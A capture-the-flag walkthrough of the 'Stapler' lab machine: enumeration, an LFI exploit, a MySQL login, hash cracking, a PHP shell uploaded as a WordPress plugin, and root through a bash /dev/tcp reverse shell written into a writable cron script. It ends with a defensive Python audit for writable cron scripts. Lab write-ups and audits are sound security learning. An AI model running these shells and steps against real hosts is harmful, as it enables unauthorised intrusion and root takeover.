🐧Stapler
Enumeration
Nmap scan
nmap -sV -p- -A 192.168.197.148

Service Enumeration
Port 21
Port 21 allows anonymous FTP login.

Note file from FTP.

Now we know we have at least three users: Harry, Elly, and John.
Port 80

Port 139
SMB allows anonymous login.

Grabbed all files from kathy and tmp.
Port 12380
Nikto scan


DOH!
So I'm an idiot and spent a few hours wondering why none of my scans against this box's web servers worked: it's using HTTPS, not HTTP.

The box's IP is now 192.168.87.148.
Gobuster scan
gobuster dir -k -u https://192.168.87.148:12380/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html,php -t 200
Robots.txt

Interesting places


WPScan
wpscan --url https://192.168.87.148:12380/blogblog --disable-tls-checks --enumerate
Had to get a hint here.
List of plugins.

I was not finding anything on WPScan's website about these plugins. Found that searchsploit would bring up an exploit if I searched for "advanced video".

Had trouble getting the exploit from searchsploit to run. Found another Python exploit at https://github.com/gtech/39646/blob/master/39646.py; this one works for LFI.


Port 3306
Connected via MySQL
mysql -uroot -pplbkac -h192.168.87.148


Port 12380 - Revisited
Used the root credentials to log into the phpMyAdmin web page.

Returned on 1/23/2023. New IP is 192.168.112.148. Grabbed all the hashes for cracking.

Cracking the hashes.
john hashes.txt --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

Found that John was an admin user when checking the accounts.

Found that I could upload my own plugin, so I uploaded my shell. It prompts for an FTP login, but one is not required; it still uploads the file.

Found the shell in /blogblog/wp-content/uploads/

Shell
Opened rev3.php for my shell.

Stabilized the shell.
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo; fg
stty rows 38 columns 116
Dropped LinPEAS on the machine. Found an interesting file I could edit.


Added reverse shell to cron-logrotate.sh and waited a few minutes.
echo "bash -c 'exec bash -i &>/dev/tcp/192.168.49.112/6698 <&1'" > cron-logrotate.sh
Root

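The escalation above works because a script that cron runs as root was editable by a low-privileged user. As an added example (not part of the original writeup), here is a Python audit that parses system-crontab entries and flags scripts that are group- or world-writable, or that sit in a world-writable directory; the cron lines and the backup.sh name in demo() are a constructed fixture that only reuses the page's cron-logrotate.sh file name.

```python
import os
import stat
import tempfile

SYSTEM_CRON_FIELDS = 6  # /etc/crontab, /etc/cron.d/*: five time fields, user, command


def cron_targets(crontab_text):
    """Yield (user, path) for entries whose command starts with an absolute path."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        parts = line.split(None, SYSTEM_CRON_FIELDS)
        if len(parts) <= SYSTEM_CRON_FIELDS:
            continue
        user, command = parts[5], parts[6]
        target = command.split()[0]
        if target.startswith("/"):
            yield user, target


def weak_cron_scripts(crontab_text):
    """Return (user, path, reason) for cron targets a non-owner could alter:
    group/world-writable files, or files in a world-writable, non-sticky directory."""
    findings = []
    for user, path in cron_targets(crontab_text):
        if not os.path.exists(path):
            continue
        if os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((user, path, "script is group/world-writable"))
        parent = os.stat(os.path.dirname(path)).st_mode
        if parent & stat.S_IWOTH and not parent & stat.S_ISVTX:
            findings.append((user, path, "parent directory is world-writable"))
    return findings


def demo():
    """Constructed fixture: one mode-777 script (the condition abused above) and one mode-755."""
    workdir = tempfile.mkdtemp()  # private (0700) dir, so no parent-dir finding
    weak = os.path.join(workdir, "cron-logrotate.sh")
    safe = os.path.join(workdir, "backup.sh")  # hypothetical name
    for path, mode in ((weak, 0o777), (safe, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    crontab = ("SHELL=/bin/sh\n# m h dom mon dow user command\n"
               f"*/5 * * * * root {weak} >/dev/null 2>&1\n0 3 * * * root {safe}\n")
    return weak_cron_scripts(crontab)
```

Run weak_cron_scripts() over the real /etc/crontab and /etc/cron.d/* contents on a host to get the same report for its actual jobs.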